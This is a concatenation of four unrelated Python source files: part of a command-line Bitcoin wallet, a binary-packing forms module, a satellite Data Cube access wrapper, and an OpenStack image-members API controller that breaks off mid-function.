break
else:
print("Error. Only y/n values are allowed.")
return res
def to_usd(amount):
global NO_FIAT, BTCUSD_RATE, BTCUSD_FETCHED
if NO_FIAT:
return 0
if amount is None: amount = 0
# caching the exchange rate for 5 minutes
if BTCUSD_RATE == 0 or BTCUSD_FETCHED + 300 < time.time():
try:
resp = make_request('https://apiv2.bitcoinaverage.com/indices/global/ticker/BTCUSD')
jsonobj = json.loads(resp)
BTCUSD_RATE = jsonobj['last']
BTCUSD_FETCHED = time.time()
except Exception as e:
pass
return amount * BTCUSD_RATE
def build_commands():
sendcmd = argparse.ArgumentParser(prog='send', description=
'Send bitcoins to a destination address.')
sendcmd.add_argument('idx', metavar = 'IDX', type=int,
help='Index of the address to send from')
sendcmd.add_argument('dest', metavar = 'DESTINATION', help = 'Destination address')
sendcmd.add_argument('amount', metavar = 'AMOUNT', type=float,
help='Amount of BTC to send')
sendcmd.add_argument('-f', '--fee', help='Transaction fee', type=float, default = None)
sendcmd.add_argument('-c', '--changeAddress', help='Change address')
sendcmd.add_argument('-m', '--makeOnly', action='store_true',
help='Only craft a tx and print it out without sending')
listcmd = argparse.ArgumentParser(prog='list', description=
'List the generated addresses.')
listcmd.add_argument('-s', '--showSpent', action='store_true',
help='Show used/spent addresses', default=False)
exitcmd = argparse.ArgumentParser(prog='exit', description='Exits the program.')
sweepcmd = argparse.ArgumentParser(prog='sweep', description=
        'Sweep an existing private key into an existing address.')
sweepcmd.add_argument('priv', metavar = 'PRIVKEY',
help = 'Private key to sweep (WIF format).')
sweepcmd.add_argument('-i', '--index', type=int, help=('Index of an existing address to sweep into.'
'If not specified, funds are swept into the first unused address.'))
refreshcmd = argparse.ArgumentParser(prog='refresh', description=
'Updates the balances.')
expandcmd = argparse.ArgumentParser(prog='expand', description=
'Expands a deterministic wallet by N entries.')
expandcmd.add_argument('n', metavar = 'N', help = 'Number of addresses to expand by.',
type=int, default = 5)
savepasscmd = argparse.ArgumentParser(prog='save', description=
'Encrypts the passphrase with AES and saves it to a file.')
savepasscmd.add_argument('-f', '--filename', default = 'key.txt', help = 'Custom file name')
dumpprivcmd = argparse.ArgumentParser(prog='dumppriv', description=
'Shows the private key for the specified index.')
dumpprivcmd.add_argument('idx', metavar = 'IDX', type=int, help = 'Address index')
helpcmd = argparse.ArgumentParser(prog='help', description='Displays help')
signcmd = argparse.ArgumentParser(prog='sign', description='Reads a plaintext and signs it.')
signcmd.add_argument('idx', metavar = 'IDX', type=int,
help='Index of the address whose private key to sign with')
dumpaddrcmd = argparse.ArgumentParser(prog='dumpaddr', description='Dumps all generated '
'addresses to a file')
dumpaddrcmd.add_argument('-p', '--path', help = 'The path to the file',
default="addresses.txt")
cmds = {}
cmds['send'] = sendcmd
cmds['list'] = listcmd
cmds['exit'] = exitcmd
cmds['refresh'] = refreshcmd
cmds['sweep'] = sweepcmd
cmds['expand'] = expandcmd
cmds['save'] = savepasscmd
cmds['dumppriv'] = dumpprivcmd
cmds['help'] = helpcmd
cmds['sign'] = signcmd
cmds['dumpaddr'] = dumpaddrcmd
return cmds
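# Editor's note: example interactive session (all values are hypothetical).
#   > list -s                        show every address, including spent ones
#   > send 0 <dest_address> 0.1 -f 0.0001
#                                    send 0.1 BTC from address #0, 0.0001 BTC fee
#   > sweep <wif_private_key> -i 2   sweep an outside key into address #2
#   > save -f mykey.txt              encrypt and store the passphrase
# Amounts are entered in BTC; input_loop converts them to satoshis before
# calling send().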
def main():
data_provider_help = 'data provider for the wallet'
no_conv_help = 'turns off fiat conversion'
file_help = 'reads the passphrase from a previously saved key file'
diceware_help = 'interprets the passphrase as a series of diceware numbers'
offline_help = 'starts the wallet in the offline mode'
url_help = '''sets a custom hostname for the selected data provider.
The format should be e.g. http[s]://url.com[:80].
Useful for open source block explorers that exist in different
locations but have identical operation contracts'''
parser = argparse.ArgumentParser()
parser.add_argument('-d', '--dataProvider',
choices=['blockchaininfo', 'blockr', 'insight', 'blockcypher'],
default='blockchaininfo', help = data_provider_help)
parser.add_argument('-n', '--noConversion', action='store_true',
default=False, help = no_conv_help)
parser.add_argument('-f', '--file', help = file_help)
parser.add_argument('-w', '--diceware', action='store_true',
default=False, help = diceware_help)
parser.add_argument('-o', '--offline', action='store_true',
default=False, help = offline_help)
parser.add_argument('-u', '--url', help = url_help)
args = parser.parse_args()
global NO_FIAT, PROVIDER, RECOMMENDED_FEE
PROVIDER = get_provider_by_name(args.dataProvider)
NO_FIAT = args.noConversion
try:
resp = make_request('https://bitcoinfees.21.co/api/v1/fees/recommended')
jsonobj = json.loads(resp)
RECOMMENDED_FEE = min(1000, jsonobj['fastestFee'])
except Exception as e:
print('Failed to fetch the recommended fee. '
'Using {} satoshis per byte'.format(RECOMMENDED_FEE))
if args.url is not None:
PROVIDER.host = args.url.strip().strip('/')
print('Data provider: {}, host: {}'.format(
colorize('yellow', PROVIDER.name()),
colorize('yellow', PROVIDER.host)))
ph = None
filename = None
if args.file is None and os.path.isfile('key.txt'):
filename = 'key.txt'
elif args.file is not None:
if os.path.isfile(args.file):
filename = args.file
else:
print('Could not find the specified file. Enter passphrase manually.')
if filename is not None:
print('Decrypting file and extracting passphrase...')
try:
ph = get_ph_from_file(filename)
except IOError:
print('Could not decrypt the file.')
return
else:
ph = getpass.getpass('Seed:')
if args.diceware is True:
diceware_dict = diceware.load_diceware()
ph = diceware.to_string(ph, diceware_dict)
wallet = Wallet(ph)
if not args.offline:
wallet.auto_init()
        print('Used addresses with a balance of zero BTC are hidden.\n'
'Use list -s to show such addresses.\n')
else:
print(colorize('yellow', 'Wallet offline. Use "expand" to generate addresses'))
print_wallet(wallet)
cmds = build_commands()
print("Type 'help' to display available commands")
while True:
try:
if not input_loop(cmds, wallet):
break
except AddrOutOfRangeEx:
print('The specified address index is out of generated range. '
'Use the expand command to generate more addresses.')
except Exception as e:
import traceback
print('Error:')
traceback.print_exc()
del(ph)
del(wallet)
cls()
def input_loop(cmds, wallet):
input = raw_input('> ').strip()
c = input.split(' ', 1)[0]
if c == '':
return True
cmd = cmds.get(c)
if cmd is None:
print('No such command. Type help to see available commands')
return True
cmd_args = None
try:
cmd_args = cmd.parse_args(input.split()[1:])
except SystemExit:
return True
if c == 'send':
send( wallet, cmd_args.idx, cmd_args.dest,
int(cmd_args.amount * SATOSHIS),
int(cmd_args.fee * SATOSHIS) if cmd_args.fee is not None else None,
cmd_args.changeAddress,
cmd_args.makeOnly)
elif c == 'help':
display_help(cmds)
elif c == 'list':
print_wallet(wallet, cmd_args.showSpent)
elif c == 'refresh':
refresh_wallet(wallet)
elif c == 'sweep':
sweep(wallet, cmd_args.priv, cmd_args.index)
elif c == 'q' or c == 'quit' or c == 'exit':
return False
elif c == 'expand':
wallet.expand(cmd_args.n)
elif c == 'save':
        save_ph_to_file(cmd_args.filename, wallet.passphrase)
elif c == 'dumppriv':
print(wallet.get(cmd_args.idx).priv)
elif c == 'sign':
sign_text(wallet.get(cmd_args.idx))
elif c == 'dumpaddr':
dump_addr(wallet, cmd_args.path)
elif c == 'exit':
return False
return True
def cls():
from subprocess import call
system = platform.system()
if system == 'Linux':
call('reset', shell = True)
elif system == 'Windows':
call('cls', shell = True)
def update_progress(progress, text):
barLength = 20
status = ""
if progress < 0:
progress = 0
status = "Halt...\n"
if progress >= 1:
progress = 1
status = "Done...\n"
block = int(round(barLength*progress))
text = "\r" + text + ": [{0}] {1:.0f}% {2}".format(
"|"*block + "-"*(barLength-block), progress*100, status)
sys.stdout.write(text)
sys.stdout.flush()
def colorize(color, text):
system = platform.system()
if system != 'Linux':
return text
else:
colors = {
'header': '\033[95m',
'blue': '\033[94m',
'green': '\033[92m',
'yellow': '\033[93m',
'fail': '\033[91m',
'end': '\033[0m',
'bold': '\033[1m',
'underline': '\033[4m',
}
return colors[color] + text + colors['end']
if __name__ == "__main__":
main()
|
|
import struct
import wtforms
from wtforms.validators import Length, NumberRange
from . import core
class BasicBinaryField(core.BinaryField):
# Some BinaryFields will have inherent value restrictions, based on the
# limitations of the serialized form. For example, a UInt8Field cannot
# store numbers above 0xFF. When the class is instantiated, these
# validators will be silently added to any validators provided by the
# constructor.
initial_validators = []
def __init__(self, label='', validators=None, order=None, **kwargs):
core.BinaryItem.__init__(self)
self.size = struct.calcsize(self.pack_string)
self.order = order
# Clone the initial_validators list to avoid mutating a class
# variable.
all_vldtrs = list(self.initial_validators)
if validators is not None:
all_vldtrs.extend(validators)
self.form_field = self.form_field_class(label, all_vldtrs, **kwargs)
def pack(self, data, order=None):
order = self.order or order or ''
return self.pack_data(data, order)
def pack_data(self, data, order):
return struct.pack(order + self.pack_string, data)
def unpack(self, buffer, order=None):
order = self.order or order or ''
return self.unpack_data(buffer, order)
def unpack_data(self, buffer, order):
return struct.unpack(order + self.pack_string, buffer)[0]
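# A minimal, self-contained sketch (illustrative names only) of what pack()
# and unpack() compose under the hood: an optional byte-order prefix plus the
# field's pack_string, handed straight to the struct module.
def _sketch_pack_roundtrip():
    pack_string = 'H'                                # e.g. UInt16Field.pack_string
    order = '>'                                      # big-endian, as a caller might pass
    packed = struct.pack(order + pack_string, 513)   # b'\x02\x01'
    assert struct.unpack(order + pack_string, packed)[0] == 513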
class CharField(BasicBinaryField):
"""
Store a single byte as a one-character ``str`` (in Python 2) or ``bytes``
object (in Python 3).
Attributes:
size: always ``1``
form_field: A :class:`wtforms.fields.StringField` instance.
"""
form_field_class = wtforms.StringField
initial_validators = [Length(min=1, max=1)]
pack_string = 'c'
class BinaryBooleanField(BasicBinaryField):
"""
Store either ``True`` or ``False`` as ``b'\\x01'`` or ``b'\\x00'``
(respectively).
Attributes:
size: always ``1``
form_field: A :class:`wtforms.fields.BooleanField` instance.
"""
form_field_class = wtforms.BooleanField
pack_string = '?'
class BinaryIntegerField(BasicBinaryField):
"""
This class should not be instantiated directly; instead, you should use
one of its subclasses, which determine what kind of int is stored, and
how. Those subclasses are:
==================== ==== =============== ================
Name size Min Max
==================== ==== =============== ================
:class:`Int8Field` 1 -128 127
:class:`UInt8Field` 1 0 255
:class:`Int16Field` 2 -32768 32767
:class:`UInt16Field` 2 0 65535
:class:`Int32Field` 4 -2\ :sup:`31` 2\ :sup:`31` - 1
:class:`UInt32Field` 4 0 2\ :sup:`32` - 1
:class:`Int64Field` 8 -2\ :sup:`63` 2\ :sup:`63` - 1
:class:`UInt64Field` 8 0 2\ :sup:`64` - 1
==================== ==== =============== ================
Attributes:
form_field: A :class:`wtforms.fields.IntegerField` instance.
"""
form_field_class = wtforms.IntegerField
@property
def initial_validators(self):
return [NumberRange(self.min, self.max)]
class Int8Field(BinaryIntegerField):
pack_string = 'b'
min = -128
max = 127
class UInt8Field(BinaryIntegerField):
pack_string = 'B'
min = 0
max = (2 ** 8) - 1
class Int16Field(BinaryIntegerField):
pack_string = 'h'
min = -(2 ** 15)
max = (2 ** 15) - 1
class UInt16Field(BinaryIntegerField):
pack_string = 'H'
min = 0
max = (2 ** 16) - 1
class Int32Field(BinaryIntegerField):
pack_string = 'i'
min = -(2 ** 31)
max = (2 ** 31) - 1
class UInt32Field(BinaryIntegerField):
pack_string = 'I'
min = 0
max = (2 ** 32) - 1
class Int64Field(BinaryIntegerField):
pack_string = 'q'
min = -(2 ** 63)
max = (2 ** 63) - 1
class UInt64Field(BinaryIntegerField):
pack_string = 'Q'
min = 0
max = (2 ** 64) - 1
class Float32Field(BasicBinaryField):
"""
Store a ``float`` in four bytes.
Attributes:
size: Always ``4``.
form_field: A :class:`wtforms.fields.FloatField` instance.
"""
form_field_class = wtforms.FloatField
pack_string = 'f'
class Float64Field(BasicBinaryField):
"""
Store a ``float`` in eight bytes.
Attributes:
size: Always ``8``.
form_field: A :class:`wtforms.fields.FloatField` instance.
"""
form_field_class = wtforms.FloatField
pack_string = 'd'
class BytesField(BasicBinaryField):
"""
Store *N* bytes.
Attributes:
max_length: Maximum number of bytes in the stored string. Note that
this may not be equal to :attr:`size`.
size: The :attr:`size` of a :class:`BytesField` with ``max_length``
*N* varies based on the *length* argument used to construct it.
If *length* is :attr:`~minform.FIXED` or
:attr:`~minform.AUTOMATIC`, ``size`` will be *N*.
If *length* is :attr:`~minform.EXPLICIT`, there will be one or
more extra bytes at the beginning of the packed data, which store
the number of bytes used by the string. This will be the smallest
number of bytes needed to store a number up to ``max_length``. So,
``size`` can be *N+1*, *N+2*, *N+4*, or *N+8*. (For more
information, see the documentation for :data:`~minform.EXPLICIT`.)
form_field: A :class:`wtforms.fields.StringField` instance.
"""
form_field_class = wtforms.StringField
def __init__(self, label='', validators=None, max_length=None,
length=core.AUTOMATIC, order=None, **kwargs):
if not isinstance(max_length, int) or max_length < 1:
raise ValueError('BytesField must be created with a '
'positive max_length keyword argument.')
self.order = order
self.length = length
self.max_length = max_length
if self.length == core.FIXED:
self.initial_validators = [Length(max=max_length, min=max_length)]
self.pack_string = '{0}s'.format(max_length)
elif self.length == core.AUTOMATIC:
self.initial_validators = [Length(max=max_length)]
self.pack_string = '{0}s'.format(max_length)
elif self.length == core.EXPLICIT:
self.initial_validators = [Length(max=max_length)]
self.length_field = store_numbers_up_to(max_length, order=order)
self.pack_string = '{0}{1}s'.format(self.length_field.pack_string,
max_length)
super(BytesField, self).__init__(label, validators, order, **kwargs)
def pack_data(self, data, order):
buffer = bytearray(self.size)
length = len(data)
if self.length == core.EXPLICIT:
pack_length_string = order + self.length_field.pack_string
struct.pack_into(pack_length_string, buffer, 0, length)
start = self.length_field.size
else:
start = 0
buffer[start:start+length] = data
return buffer
def unpack_data(self, buffer, order):
if self.length == core.EXPLICIT:
unpack_length_string = order + self.length_field.pack_string
length = struct.unpack_from(unpack_length_string, buffer)[0]
if length > self.max_length:
message = "Buffer cannot contain {0} bytes.".format(length)
raise ValueError(message)
data_buffer = buffer[self.length_field.size:]
else:
length = self.max_length
data_buffer = buffer
data = data_buffer[:length]
if self.length == core.AUTOMATIC:
data = data.rstrip(b'\x00')
return data
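# A sketch of the EXPLICIT layout described in the BytesField docstring
# (assumptions: max_length=5, so the length prefix is a single unsigned byte;
# '>' is an arbitrary example byte order).
def _sketch_explicit_layout():
    max_length = 5
    data = b'abc'
    buf = bytearray(1 + max_length)
    struct.pack_into('>B', buf, 0, len(data))        # length prefix
    buf[1:1 + len(data)] = data                      # payload, zero-padded to max_length
    assert bytes(buf) == b'\x03abc\x00\x00'
    length = struct.unpack_from('>B', bytes(buf))[0]
    assert bytes(buf[1:1 + length]) == data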
def store_numbers_up_to(n, signed=False, **kwargs):
"""
Return a BinaryIntegerField that can store numbers up to a certain maximum.
If ``n`` is too big for any available field, a ``ValueError`` will be raised.
Parameters:
n: The highest number that you expect to need to store (must be at
most a 64-bit integer).
signed: Return a field that can store negative numbers.
kwargs: Additional arguments get passed into the binary field
constructor.
Returns:
BinaryIntegerField: A :class:`BinaryIntegerField` that can store
numbers up to at least ``n``.
"""
if signed:
if n <= Int8Field.max:
return Int8Field(**kwargs)
elif n <= Int16Field.max:
return Int16Field(**kwargs)
elif n <= Int32Field.max:
return Int32Field(**kwargs)
elif n <= Int64Field.max:
return Int64Field(**kwargs)
else:
raise ValueError("Can't track numbers up to {0}".format(n))
else:
if n <= UInt8Field.max:
return UInt8Field(**kwargs)
elif n <= UInt16Field.max:
return UInt16Field(**kwargs)
elif n <= UInt32Field.max:
return UInt32Field(**kwargs)
elif n <= UInt64Field.max:
return UInt64Field(**kwargs)
else:
raise ValueError("Can't track numbers up to {0}".format(n))
|
|
# Copyright 2016 United States Government as represented by the Administrator
# of the National Aeronautics and Space Administration. All Rights Reserved.
#
# Portion of this code is Copyright Geoscience Australia, Licensed under the
# Apache License, Version 2.0 (the "License"); you may not use this file
# except in compliance with the License. You may obtain a copy of the License
# at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# The CEOS 2 platform is licensed under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0.
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
# datacube imports.
import datacube
from datacube.api import *
# basic stuff.
from collections import defaultdict
import time
from datetime import datetime
import json
# dc data comes out as xray arrays
import xarray as xr
import xarray.ufuncs
# gdal related stuff.
import gdal
from gdalconst import *
# np for arrays
import numpy as np
# Author: AHDS
# Creation date: 2016-06-23
# Modified by:
# Last modified date: 2016-08-05
class DataAccessApi:
"""
Class that provides wrapper functionality for the DataCube.
"""
dc = None
api = None
# defaults for all the required fields.
product_default = 'ls7_ledaps'
platform_default = 'LANDSAT_7'
def __init__(self):
# using both the datacube object and the api.
# dc is useful for all data access, api is only really used for metadata
# fetching.
# hardcoded config location. could parameterize.
self.dc = datacube.Datacube(config='/home/localuser/Datacube/data_cube_ui/config/.datacube.conf')
#self.dc = datacube.Datacube()
self.api = datacube.api.API(datacube=self.dc)
"""
query params are defined in datacube.api.query
"""
def get_dataset_by_extent(self, product, product_type=None, platform=None, time=None,
longitude=None, latitude=None, measurements=None, output_crs=None, resolution=None):
"""
Gets and returns data based on lat/long bounding box inputs.
All params are optional. Leaving one out will just query the dc without it (e.g. leaving out
lat/lng but giving product returns a dataset containing the entire product).
Args:
product (string): The name of the product associated with the desired dataset.
product_type (string): The type of product associated with the desired dataset.
platform (string): The platform associated with the desired dataset.
time (tuple): A tuple consisting of the start time and end time for the dataset.
longitude (tuple): A tuple of floats specifying the min,max longitude bounds.
latitude (tuple): A tuple of floats specifying the min,max latitude bounds.
measurements (list): A list of strings that represents all measurements.
output_crs (string): Determines reprojection of the data before it is returned
resolution (tuple): A tuple of min,max ints to determine the resolution of the data.
Returns:
data (xarray): dataset with the desired data.
"""
# there is probably a better way to do this but I'm not aware of it.
query = {}
if product_type is not None:
query['product_type'] = product_type
if platform is not None:
query['platform'] = platform
if time is not None:
query['time'] = time
if longitude is not None and latitude is not None:
query['longitude'] = longitude
query['latitude'] = latitude
data = self.dc.load(product=product, measurements=measurements,
output_crs=output_crs, resolution=resolution, **query)
# data = self.dc.load(product=product, product_type=product_type, platform=platform, time=time, longitude=longitude,
# latitude=latitude, measurements=measurements, output_crs=output_crs,
# resolution=resolution)
return data
def get_dataset_tiles(self, product, product_type=None, platform=None, time=None,
longitude=None, latitude=None, measurements=None, output_crs=None, resolution=None):
"""
Gets and returns data based on lat/long bounding box inputs.
All params are optional. Leaving one out will just query the dc without it (e.g. leaving out
lat/lng but giving product returns a dataset containing the entire product).
Args:
product (string): The name of the product associated with the desired dataset.
product_type (string): The type of product associated with the desired dataset.
platform (string): The platform associated with the desired dataset.
time (tuple): A tuple consisting of the start time and end time for the dataset.
longitude (tuple): A tuple of floats specifying the min,max longitude bounds.
latitude (tuple): A tuple of floats specifying the min,max latitude bounds.
measurements (list): A list of strings that represents all measurements.
output_crs (string): Determines reprojection of the data before it is returned
resolution (tuple): A tuple of min,max ints to determine the resolution of the data.
Returns:
data (xarray): dataset with the desired data in tiled sections.
"""
# there is probably a better way to do this but I'm not aware of it.
query = {}
if product_type is not None:
query['product_type'] = product_type
if platform is not None:
query['platform'] = platform
if time is not None:
query['time'] = time
if longitude is not None and latitude is not None:
query['longitude'] = longitude
query['latitude'] = latitude
#set up the grid workflow
gw = GridWorkflow(self.dc.index, product=product)
#dict of tiles.
request_tiles = gw.list_cells(product=product, measurements=measurements,
output_crs=output_crs, resolution=resolution, **query)
"""
tile_def = defaultdict(dict)
for cell, tiles in request_tiles.items():
for time, tile in tiles.items():
tile_def[cell, time]['request'] = tile
keys = list(tile_def)
data_tiles = {}
for key in keys:
tile = tile_def[key]['request']
data_tiles[key[0]] = gw.load(key[0], tile)
"""
#cells now return stacked xarrays of data.
data_tiles = {}
for tile_key in request_tiles:
tile = request_tiles[tile_key]
data_tiles[tile_key] = gw.load(tile, measurements=measurements)
return data_tiles
def get_scene_metadata(self, platform, product, longitude=None, latitude=None, crs=None, time=None):
"""
Gets a descriptor based on a request.
Args:
platform (string): Platform for which data is requested
product (string): Product for which data is requested
longitude (tuple): Tuple of min,max floats for longitude
latitude (tuple): Tuple of min,max floats for latitude
crs (string): Describes the coordinate system of params lat and long
time (tuple): Tuple of start and end datetimes for requested data
Returns:
scene_metadata (dict): Dictionary containing a variety of data that can later be
accessed.
"""
descriptor_request = {}
if platform is not None:
descriptor_request['platform'] = platform
if longitude is not None and latitude is not None:
dimensions = {}
longitude_dict = {}
latitude_dict = {}
time_dict = {}
longitude_dict['range'] = longitude
latitude_dict['range'] = latitude
if crs is not None:
longitude_dict['crs'] = crs
latitude_dict['crs'] = crs
dimensions['longitude'] = longitude_dict
dimensions['latitude'] = latitude_dict
if time is not None:
time_dict['range'] = time
dimensions['time'] = time_dict
descriptor_request['dimensions'] = dimensions
descriptor = self.api.get_descriptor(descriptor_request=descriptor_request)
scene_metadata = {}
if product in descriptor and len(descriptor[product]['result_min']) > 2:
scene_metadata['lat_extents'] = (descriptor[product]['result_min'][1], descriptor[product]['result_max'][1])
scene_metadata['lon_extents'] = (descriptor[product]['result_min'][2], descriptor[product]['result_max'][2])
scene_metadata['time_extents'] = (descriptor[product]['result_min'][0], descriptor[product]['result_max'][0])
scene_metadata['tile_count'] = len(descriptor[product]['storage_units'])
scene_metadata['scene_count'] = descriptor[product]['result_shape'][0]
scene_metadata['pixel_count'] = descriptor[product]['result_shape'][1] * descriptor[product]['result_shape'][2]
scene_metadata['storage_units'] = descriptor[product]['storage_units']
else:
scene_metadata = {'lat_extents': (0,0), 'lon_extents': (0,0), 'time_extents': (0,0), 'tile_count': 0, 'scene_count': 0, 'pixel_count': 0, 'storage_units': {}}
return scene_metadata
def list_acquisition_dates(self, platform, product, longitude=None, latitude=None, crs=None, time=None):
"""
Get a list of all acquisition dates for a query.
Args:
platform (string): Platform for which data is requested
product (string): Product for which data is requested
longitude (tuple): Tuple of min,max floats for longitude
latitude (tuple): Tuple of min,max floats for latitude
crs (string): Describes the coordinate system of params lat and long
time (tuple): Tuple of start and end datetimes for requested data
Returns:
times (list): Python list of dates that can be used to query the dc for single time
sliced data.
"""
metadata = self.get_scene_metadata(platform, product, longitude=longitude, latitude=latitude, crs=crs, time=time)
# gets the acquisition times from the storage unit keys
# (a utc-offset correction, e.g. unit[0] + unit[0].utcoffset(), is not applied here).
times = set([unit[0] for unit in metadata['storage_units'].keys()])
return sorted(times)
def get_datacube_metadata(self, platform, product):
"""
Gets some details on the cube and its contents.
Args:
platform (string): Desired platform for requested data.
product (string): Desired product for requested data.
Returns:
datacube_metadata (dict): a dict with multiple keys containing relevant metadata.
"""
descriptor = self.api.get_descriptor({'platform': platform})
datacube_metadata = {}
if product in descriptor:
datacube_metadata['lat_extents'] = (descriptor[product]['result_min'][1], descriptor[product]['result_max'][1])
datacube_metadata['lon_extents'] = (descriptor[product]['result_min'][2], descriptor[product]['result_max'][2])
datacube_metadata['time_extents'] = (descriptor[product]['result_min'][0], descriptor[product]['result_max'][0])
datacube_metadata['tile_count'] = len(descriptor[product]['storage_units'])
datacube_metadata['scene_count'] = descriptor[product]['result_shape'][0]
datacube_metadata['pixel_count'] = descriptor[product]['result_shape'][1] * descriptor[product]['result_shape'][2]
else:
datacube_metadata = {'lat_extents': (0,0), 'lon_extents': (0,0), 'time_extents': (0,0), 'tile_count': 0, 'scene_count': 0, 'pixel_count': 0}
return datacube_metadata
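# A minimal usage sketch (assumptions: a local Data Cube install with the
# 'ls7_ledaps' product ingested; the bounds and dates below are illustrative).
if __name__ == '__main__':
    api = DataAccessApi()
    dataset = api.get_dataset_by_extent(
        'ls7_ledaps',
        platform='LANDSAT_7',
        time=(datetime(2015, 1, 1), datetime(2015, 12, 31)),
        longitude=(35.0, 35.5),
        latitude=(0.0, 0.5),
        measurements=['red', 'green', 'blue'])
    acquisitions = api.list_acquisition_dates(
        'LANDSAT_7', 'ls7_ledaps',
        longitude=(35.0, 35.5), latitude=(0.0, 0.5))
    print(dataset)
    print('{} acquisitions'.format(len(acquisitions)))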
|
|
# Copyright 2013 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import copy
import glance_store
from oslo.serialization import jsonutils
from oslo_log import log as logging
from oslo_utils import timeutils
import six
import webob
from daisy.api import policy
from daisy.common import exception
from daisy.common import utils
from daisy.common import wsgi
import daisy.db
import daisy.gateway
from daisy import i18n
import daisy.notifier
import daisy.schema
LOG = logging.getLogger(__name__)
_ = i18n._
class ImageMembersController(object):
def __init__(self, db_api=None, policy_enforcer=None, notifier=None,
store_api=None):
self.db_api = db_api or daisy.db.get_api()
self.policy = policy_enforcer or policy.Enforcer()
self.notifier = notifier or daisy.notifier.Notifier()
self.store_api = store_api or glance_store
self.gateway = daisy.gateway.Gateway(self.db_api, self.store_api,
self.notifier, self.policy)
@utils.mutating
def create(self, req, image_id, member_id):
"""
Adds a membership to the image.
:param req: the Request object coming from the wsgi layer
:param image_id: the image identifier
:param member_id: the member identifier
:retval The response body is a mapping of the following form::
{'member_id': <MEMBER>,
'image_id': <IMAGE>,
'status': <MEMBER_STATUS>
'created_at': ..,
'updated_at': ..}
"""
image_repo = self.gateway.get_repo(req.context)
image_member_factory = self.gateway.get_image_member_factory(
req.context)
try:
image = image_repo.get(image_id)
member_repo = image.get_member_repo()
new_member = image_member_factory.new_image_member(image,
member_id)
member_repo.add(new_member)
return new_member
except exception.NotFound:
msg = _("Image %s not found.") % image_id
LOG.warning(msg)
raise webob.exc.HTTPNotFound(explanation=msg)
except exception.Forbidden:
msg = _("Not allowed to create members for image %s.") % image_id
LOG.warning(msg)
raise webob.exc.HTTPForbidden(explanation=msg)
except exception.Duplicate:
msg = _("Member %(member_id)s is duplicated for image "
"%(image_id)s") % {"member_id": member_id,
"image_id": image_id}
LOG.warning(msg)
raise webob.exc.HTTPConflict(explanation=msg)
except exception.ImageMemberLimitExceeded as e:
msg = (_("Image member limit exceeded for image %(id)s: %(e)s:")
% {"id": image_id, "e": utils.exception_to_str(e)})
LOG.warning(msg)
raise webob.exc.HTTPRequestEntityTooLarge(explanation=msg)
@utils.mutating
def update(self, req, image_id, member_id, status):
"""
Updates the status of a membership for the given image.
:param req: the Request object coming from the wsgi layer
:param image_id: the image identifier
:param member_id: the member identifier
:retval The response body is a mapping of the following form::
{'member_id': <MEMBER>,
'image_id': <IMAGE>,
'status': <MEMBER_STATUS>
'created_at': ..,
'updated_at': ..}
"""
image_repo = self.gateway.get_repo(req.context)
try:
image = image_repo.get(image_id)
member_repo = image.get_member_repo()
member = member_repo.get(member_id)
member.status = status
member_repo.save(member)
return member
except exception.NotFound:
msg = _("Image %s not found.") % image_id
LOG.warning(msg)
raise webob.exc.HTTPNotFound(explanation=msg)
except exception.Forbidden:
msg = _("Not allowed to update members for image %s.") % image_id
LOG.warning(msg)
raise webob.exc.HTTPForbidden(explanation=msg)
except ValueError as e:
msg = _("Incorrect request: %s") % utils.exception_to_str(e)
LOG.warning(msg)
raise webob.exc.HTTPBadRequest(explanation=msg)
def index(self, req, image_id):
"""
Return a list of dictionaries indicating the members of the
image, i.e., those tenants the image is shared with.
:param req: the Request object coming from the wsgi layer
:param image_id: The image identifier
:retval The response body is a mapping of the following form::
{'members': [
{'member_id': <MEMBER>,
'image_id': <IMAGE>,
'status': <MEMBER_STATUS>
'created_at': ..,
'updated_at': ..}, ..
]}
"""
image_repo = self.gateway.get_repo(req.context)
try:
image = image_repo.get(image_id)
member_repo = image.get_member_repo()
members = []
for member in member_repo.list():
members.append(member)
return dict(members=members)
except exception.NotFound:
msg = _("Image %s not found.") % image_id
LOG.warning(msg)
raise webob.exc.HTTPNotFound(explanation=msg)
except exception.Forbidden:
msg = _("Not allowed to list members for image %s.") % image_id
LOG.warning(msg)
raise webob.exc.HTTPForbidden(explanation=msg)
def show(self, req, image_id, member_id):
"""
Returns the membership of the tenant with respect to the image_id specified.
:param req: the Request object coming from the wsgi layer
:param image_id: The image identifier
:retval The response body is a mapping of the following form::
{'member_id': <MEMBER>,
'image_id': <IMAGE>,
'status': <MEMBER_STATUS>
'created_at': ..,
'updated_at': ..}
"""
image_repo = self.gateway.get_repo(req.context)
try:
image = image_repo.get(image_id)
member_repo = image.get_member_repo()
member = member_repo.get(member_id)
return member
except (exception.NotFound, exception.Forbidden):
msg = _("Image %s not found.") % image_id
LOG.warning(msg)
raise webob.exc.HTTPNotFound(explanation=msg)
@utils.mutating
def delete(self, req, image_id, member_id):
"""
Removes a membership from the image.
"""
image_repo = self.gateway.get_repo(req.context)
try:
image = image_repo.get(image_id)
member_repo = image.get_member_repo()
member = member_repo.get(member_id)
member_repo.remove(member)
return webob.Response(body='', status=204)
except exception.NotFound:
msg = _("Image %s not found.") % image_id
LOG.warning(msg)
raise webob.exc.HTTPNotFound(explanation=msg)
except exception.Forbidden:
msg = _("Not allowed to delete members for image %s.") % image_id
LOG.warning(msg)
raise webob.exc.HTTPForbidden(explanation=msg)
class RequestDeserializer(wsgi.JSONRequestDeserializer):
def __init__(self):
super(RequestDeserializer, self).__init__()
def _get_request_body(self, request):
output = super(RequestDeserializer, self).default(request)
if 'body' not in output:
msg = _('Body expected in request.')
raise webob.exc.HTTPBadRequest(explanation=msg)
return output['body']
def create(self, request):
body = self._get_request_body(request)
try:
member_id = body['member']
if not member_id:
raise ValueError()
except KeyError:
msg = _("Member to be added not specified")
